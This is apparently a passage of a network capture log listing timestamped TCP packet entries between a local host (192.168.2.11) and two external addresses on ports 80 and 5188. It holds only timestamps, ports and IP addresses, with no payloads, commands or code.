Dec 5, 2024 17:32:14.167212963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.167264938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.167300940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.168562889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.168659925 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.168711901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.169840097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.169862032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.169888020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.169907093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.171123981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.171226025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.171266079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.172411919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.172621965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.172687054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.173774958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.173825026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.173921108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.173959970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.175015926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.175066948 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.175162077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.175199986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.176327944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.176986933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.177041054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.177576065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.177620888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.177685976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.177723885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.178996086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.179158926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.179208994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.180185080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.180226088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.180310011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.180346966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.181538105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.181588888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.181648970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.181687117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.182852030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.182900906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.182945013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.182981968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.184078932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.184206009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.184257030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.185415983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.185482025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.185842037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.185885906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.186708927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.186753035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.187274933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.187321901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.187973976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.188160896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.188235044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.189310074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.189357042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.189455032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.189493895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.190551043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.190593004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.190665007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.190696955 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.191946983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.192195892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.192241907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.193195105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.193239927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.193402052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.193442106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.194542885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.194578886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.194592953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.194624901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.195873976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.195894957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.195936918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.197094917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.197160959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.197216034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.198424101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.198478937 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.198533058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.198573112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.199666977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.199717045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.199992895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.200962067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.201008081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.201046944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.201194048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.202265024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.202316046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.203047991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.203093052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.203620911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.203665972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.203705072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.203763962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.204842091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.204885960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.204962015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.204998970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.206125021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.206187010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.206434011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.206474066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.207515955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.207561016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.207757950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.208751917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.208800077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.208957911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.209007978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.209985018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.210028887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.210062027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.210103035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.211335897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.211379051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.211541891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.211580992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.212620020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.212743044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.212781906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.213921070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.213964939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.214051962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.214093924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.215195894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.215235949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.215322018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.215361118 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.216478109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.216531038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.216696024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.216794968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.217823982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.218190908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.218234062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.219054937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.219100952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.219137907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.219180107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.221096992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.223748922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.234425068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.234730959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.234811068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.234949112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.235044003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.235129118 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.236074924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.236177921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.236270905 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.237194061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.237525940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.237588882 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.238339901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.238727093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.239469051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.239537954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.239983082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.240586042 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.240639925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.240652084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.240700960 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.241725922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.241914988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.242002964 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.242883921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.243412971 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.244052887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.244066000 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.244128942 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.245181084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.245284081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.245342016 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.246298075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.246845961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.246896029 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.247514963 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.247771978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.248667002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.248723984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.248799086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.249761105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.249835014 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.249965906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.250107050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.250839949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.251014948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.251058102 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.252042055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.252868891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.252952099 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.253155947 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.253174067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.253242970 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.254287004 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.255032063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.255104065 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.255410910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.255496979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.256563902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.256613016 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.257078886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.257694006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.257812023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.258122921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.258868933 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.258883953 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.258929014 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.258929014 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.259974003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.261162043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.261178017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.261279106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.261298895 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.262252092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.262371063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.263191938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.263387918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.263401031 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.263441086 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.263441086 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.264497995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.264693022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.265652895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.265696049 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.265763998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.266772032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.266819954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.266927958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.266962051 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.267927885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.268030882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.268071890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.269150019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.269337893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.269756079 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.270163059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.270597935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.271342039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.271378994 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.271527052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.272469044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.272505045 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.272818089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.272875071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.273612022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.273675919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.273715019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.274749994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.274825096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.275903940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.275953054 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.275990963 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.277017117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.277086020 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.277376890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.277853966 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.278153896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.278340101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.278400898 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.279303074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.279644966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.279885054 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.280411959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.280437946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.280567884 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.281558990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.281645060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.282139063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.282722950 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.282824993 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.283868074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.283941984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.284215927 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.285082102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.285157919 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.285229921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.285881996 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.286092997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.286150932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.286204100 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.287444115 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.287782907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.287842035 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.288752079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.288774014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.288912058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.289798975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.289818048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.289912939 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.290692091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.291007996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.291851997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.291975975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.292002916 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.292949915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.292998075 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.293518066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.293941021 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.294111967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.344166040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.344315052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.344405890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.344913960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.344964027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.345087051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.345226049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.346086979 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.346201897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.346225023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.346241951 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.346261024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.347289085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.347328901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.347385883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.347419024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.348305941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.348345041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.348412037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.348448992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.349653006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.349723101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.349822998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.349858046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.350663900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.350728035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.350739002 CET	80	49793	185.215.113.84	192.168.2.11
